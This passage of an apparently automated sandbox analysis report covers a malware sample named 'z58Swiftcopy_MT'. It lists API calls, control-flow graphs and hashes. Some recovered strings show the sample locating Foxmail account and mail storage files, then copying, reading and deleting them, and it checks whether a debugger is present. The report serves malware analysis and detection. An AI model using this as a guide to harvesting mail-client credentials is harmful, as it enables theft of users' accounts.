  • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7115C
  • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7116D
  • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7117C
  • Part of subcall function 33A710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71193
  • Part of subcall function 33A710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A711D0
  • Part of subcall function 33A710F1: FindClose.KERNEL32(00000000), ref: 33A711DB
• lstrlenW.KERNEL32(?), ref: 33A714C5
• lstrlenW.KERNEL32(?), ref: 33A714E0
• lstrlenW.KERNEL32(?,?), ref: 33A7150F
• lstrcatW.KERNEL32(00000000), ref: 33A71521
• lstrlenW.KERNEL32(?,?), ref: 33A71547
• lstrcatW.KERNEL32(00000000), ref: 33A71553
• lstrlenW.KERNEL32(?,?), ref: 33A71579
• lstrcatW.KERNEL32(00000000), ref: 33A71585
• lstrlenW.KERNEL32(?,?), ref: 33A715AB
• lstrcatW.KERNEL32(00000000), ref: 33A715B7
Strings
Memory Dump Source
• Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
• Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: a8c26893c9c38729d46187e1c2b354af837357900b939720e4d1e68508f0dd15
• Instruction ID: 7f994265d5233302954c0d0d03883c4320bf3184b62f93a20de88950550ad5bf
• Opcode Fuzzy Hash: a8c26893c9c38729d46187e1c2b354af837357900b939720e4d1e68508f0dd15
• Instruction Fuzzy Hash: EE81B171A00358A9DB20DBA5DC85FEE7779EF84700F00159BF908EB290EAB15A85CF95

Control-flow Graph

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33A72645
• IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 33A72710
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 33A72730
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 33A7273A
Memory Dump Source
• Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
• Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 6b454de6580761e36a8169e8a5adf4378d62c58404242bcf8f4f174951ab4c53
• Instruction ID: d98e00222f6710436c3ff2254b6e01b89680650c5038016dca4059ee7f975fcf
• Opcode Fuzzy Hash: 6b454de6580761e36a8169e8a5adf4378d62c58404242bcf8f4f174951ab4c53
• Instruction Fuzzy Hash: 7E312B75D453189BDB10DFA5CA89BCDBBF8EF08300F1040AAE80DA7250EB755A868F45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33A72276
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 33A72285
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 33A7228E
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 33A7229B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B21
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(33A7D1DC,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B2A
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B35
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33A761DA
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 33A761E4
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 33A761F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082,33A82108,0000000C,33A71F3A,?), ref: 33A74AD5
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082,33A82108,0000000C,33A71F3A,?), ref: 33A74ADC
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 33A74AEE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33A7294C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 54951025-0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D1B
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 33A71D37
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D4B
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D58
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D72
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D7D
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                                                                                                      • Opcode ID: c72c435301f88bad63923b41274ec72e008198931dcdc7394d004f46a6666a20
                                                                                                                                                                                                                                      • Instruction ID: 0738c651fc33203f3c6d05d1eac0ca10b3ad2c854493aaf926c445f1b841e920
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72c435301f88bad63923b41274ec72e008198931dcdc7394d004f46a6666a20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621ECB194121CAEE710ABE4CCCCEEA76ECEF18354F040566F916E2140D6749E478B64

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 151 33a739be-33a739c8 152 33a73a6e-33a73a71 151->152 153 33a73a77 152->153 154 33a739cd-33a739dd 152->154 157 33a73a79-33a73a7d 153->157 155 33a739df-33a739e2 154->155 156 33a739ea-33a73a03 LoadLibraryExW 154->156 158 33a73a6b 155->158 159 33a739e8 155->159 160 33a73a55-33a73a5e 156->160 161 33a73a05-33a73a0e GetLastError 156->161 158->152 162 33a73a67-33a73a69 159->162 160->162 163 33a73a60-33a73a61 FreeLibrary 160->163 164 33a73a45 161->164 165 33a73a10-33a73a22 call 33a755f6 161->165 162->158 166 33a73a7e-33a73a80 162->166 163->162 168 33a73a47-33a73a49 164->168 165->164 171 33a73a24-33a73a36 call 33a755f6 165->171 166->157 168->160 169 33a73a4b-33a73a53 168->169 169->158 171->164 174 33a73a38-33a73a43 LoadLibraryExW 171->174 174->168
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                                                                      • Opcode ID: cdd85f0c32ece8a972548b038206784af4be001977c0bc4a473d684445b4c4d2
                                                                                                                                                                                                                                      • Instruction ID: 8fe24f2090e95cb2a8b788bc2c7298bbb26cea95a9fd2506e3c6bbe3bf98d45e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdd85f0c32ece8a972548b038206784af4be001977c0bc4a473d684445b4c4d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35118BB6A01711FBD71196FDCCC5A1A3758AF417A0F160116ED56BB2C0DB32D902C6D0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 33A71038
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A7104B
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A71061
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 33A71075
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 33A71090
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 33A710B8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                                      • Opcode ID: fbd39314fe1b93b9465cd601bd78cae5f794837c8df5adf669bf870dc7138d02
                                                                                                                                                                                                                                      • Instruction ID: daeb7b3203f3654a5c2945a2a6c50456323ed1b82dc44b65e223b30b01ec5474
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbd39314fe1b93b9465cd601bd78cae5f794837c8df5adf669bf870dc7138d02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0217F759003189BCF10AAE5ED88EDB37ACEF44214F14429BEC59A71A1DA30DA8BCB40

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,?,?,?,33A710DF,?,?,?,00000000), ref: 33A71E9A
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrcatW.KERNEL32(?,?,?,33A710DF,?,?,?,00000000), ref: 33A71EAC
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EB3
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EC8
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrcatW.KERNEL32(?,33A710DF,?,33A710DF,?,?,?,00000000), ref: 33A71ED3
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 33A7122A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                      • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                                      • Opcode ID: b84c36e2d60da325721145857bc781c83b2d07b3b6e9c1e54af8942ceda15c4b
                                                                                                                                                                                                                                      • Instruction ID: b9b360aac7fa9e4319edf5c29fccede3bb157d200cbab644d8ed09b86326d7cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b84c36e2d60da325721145857bc781c83b2d07b3b6e9c1e54af8942ceda15c4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80218FB9E103086AEB1097E4ECC1BEE7379EF80714F001557FA04EB2D0E6B16E818B59

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 215 33a74b39-33a74b61 GetModuleHandleExW 216 33a74b86-33a74b8a 215->216 217 33a74b63-33a74b76 GetProcAddress 215->217 220 33a74b95-33a74ba2 call 33a72ada 216->220 221 33a74b8c-33a74b8f FreeLibrary 216->221 218 33a74b85 217->218 219 33a74b78-33a74b83 217->219 218->216 219->218 221->220
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33A74AEA,?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000), ref: 33A74B59
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 33A74B6C
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,33A74AEA,?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082), ref: 33A74B8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: fbb7e603b1f6d40958f0539957ea467677a48d52f3eacacc07ff322e80b2fb2e
                                                                                                                                                                                                                                      • Instruction ID: 83e337db8dfa1eecf095e74c4d6ed63f1c8565533f8fd4e38d834337cc6ce5c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbb7e603b1f6d40958f0539957ea467677a48d52f3eacacc07ff322e80b2fb2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F03175A00208AFDB11ABD4C888F9E7FB9EF84251F404159E905B6150DB309943CB90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 225 33a79492-33a794ef GetConsoleCP 226 33a794f5-33a79511 225->226 227 33a79632-33a79644 call 33a72ada 225->227 228 33a79513-33a7952a 226->228 229 33a7952c-33a7953d call 33a77c19 226->229 231 33a79566-33a79575 call 33a779e6 228->231 236 33a79563-33a79565 229->236 237 33a7953f-33a79542 229->237 231->227 241 33a7957b-33a7959b WideCharToMultiByte 231->241 236->231 239 33a79609-33a79628 237->239 240 33a79548-33a7955a call 33a779e6 237->240 239->227 240->227 248 33a79560-33a79561 240->248 241->227 242 33a795a1-33a795b7 WriteFile 241->242 244 33a7962a-33a79630 GetLastError 242->244 245 33a795b9-33a795ca 242->245 244->227 245->227 247 33a795cc-33a795d0 245->247 249 33a795d2-33a795f0 WriteFile 247->249 250 33a795fe-33a79601 247->250 248->241 249->244 251 33a795f2-33a795f6 249->251 250->226 252 33a79607 250->252 251->227 253 33a795f8-33a795fb 251->253 252->227 253->250
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,33A79C07,?,00000000,?,00000000,00000000), ref: 33A794D4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 33A79590
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,33A79C07,00000000,?,?,?,?,?,?,?,?,?,33A79C07,?), ref: 33A795AF
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,33A79C07,00000000,?,?,?,?,?,?,?,?,?,33A79C07,?), ref: 33A795E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 977765425-0
                                                                                                                                                                                                                                      • Opcode ID: cb44c97de9691220bbcd4562d2816bbe7d1b70d607d0e7bb79868d1d1a5d2e20
                                                                                                                                                                                                                                      • Instruction ID: 6b5b58c595f54341c7cbf07b13977167372d4d3416a39daeedad68f05a7aa559
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44c97de9691220bbcd4562d2816bbe7d1b70d607d0e7bb79868d1d1a5d2e20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70517DB5A04349AFDB10CFE8C895AEEBBF9EF09310F14415FE955E7281E6709942CB60

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 254 33a71e89-33a71ec0 lstrlenW call 33a72c40 lstrcatW lstrlenW 257 33a71ec2-33a71ec5 254->257 258 33a71ed1-33a71edd lstrcatW 254->258 257->258 259 33a71ec7-33a71ecd lstrlenW 257->259 259->258
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,33A710DF,?,?,?,00000000), ref: 33A71E9A
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,33A710DF,?,?,?,00000000), ref: 33A71EAC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EB3
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EC8
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,33A710DF,?,33A710DF,?,?,?,00000000), ref: 33A71ED3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                                      • Opcode ID: 316a239e2397d3abb7f6ca8a7a72ff1f47878b5676cba3b600b446839d18b6a4
                                                                                                                                                                                                                                      • Instruction ID: c68af64eb7075c211a98699b64ab5d6b24e2b0ff36e3493bf9eb0bcc7c1c3efc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 316a239e2397d3abb7f6ca8a7a72ff1f47878b5676cba3b600b446839d18b6a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F082265002107AE62137AAECC5EBF7BBCFFC6B60F44001EFA09A31909B55584393B5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,33A7190E,?,?,00000000,?,00000000), ref: 33A71643
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 33A7165A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 33A71661
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 33A71686
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
